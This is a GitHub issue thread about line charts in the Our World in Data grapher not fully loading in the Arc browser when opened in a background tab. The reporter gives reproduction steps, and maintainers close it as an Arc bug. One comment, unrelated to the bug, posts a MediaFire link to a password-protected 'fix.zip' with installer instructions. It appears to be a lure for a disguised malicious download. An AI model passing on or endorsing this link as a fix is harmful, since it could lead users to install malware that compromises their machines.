### ISSUE TITLE
Bug: linechart not loading.

### ISSUE THREAD

**Issue by lucasrodes** [owid/owid-grapher#3903]
## Note

This issue seems to only happen in the Arc browser.

## Description
In some instances, line charts are not completely loaded.

## Expected behavior
All lines should be loaded.

## Steps to reproduce
I've observed this issue for the last few weeks, but I thought it could be temporary or random. I identified one instance when this does happen.

The error happens when you open a chart in a new tab without losing focus on your current tab.

3. Open the [chart](https://ourworldindata.org/grapher/population-growth-rate) in the comment as a 'new tab' without losing focus on the current tab.
4. Switch to the new tab.
5. The line is not fully loaded.

If I reload, the line is completely loaded.

## Screen recording

https://github.com/user-attachments/assets/a14bfe46-c9d4-4e54-88a5-dede28abe051

## Environment

For desktop, provide:

-   OS: MacOS
-   Browser Arc
-   Version 1.57.1 (Chromium Engine Version 128.0.6613.85)

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lucasrodes** [comment]
Tried on Google Chrome and didn't seem like an issue there.

**Comment by lucasrodes** [comment]
If I am quick enough to switch to the new tab, the issue doesn't show up.

https://github.com/user-attachments/assets/149a5a8f-1840-4186-9233-7a8eb8603249

**Comment by lucasrodes** [comment]
I've reported this to the Arc tech team ー let's see!

**Comment by danyx23** [comment]
Closing this as the arc browser is pretty obscure and this seems to be a bug with that browser
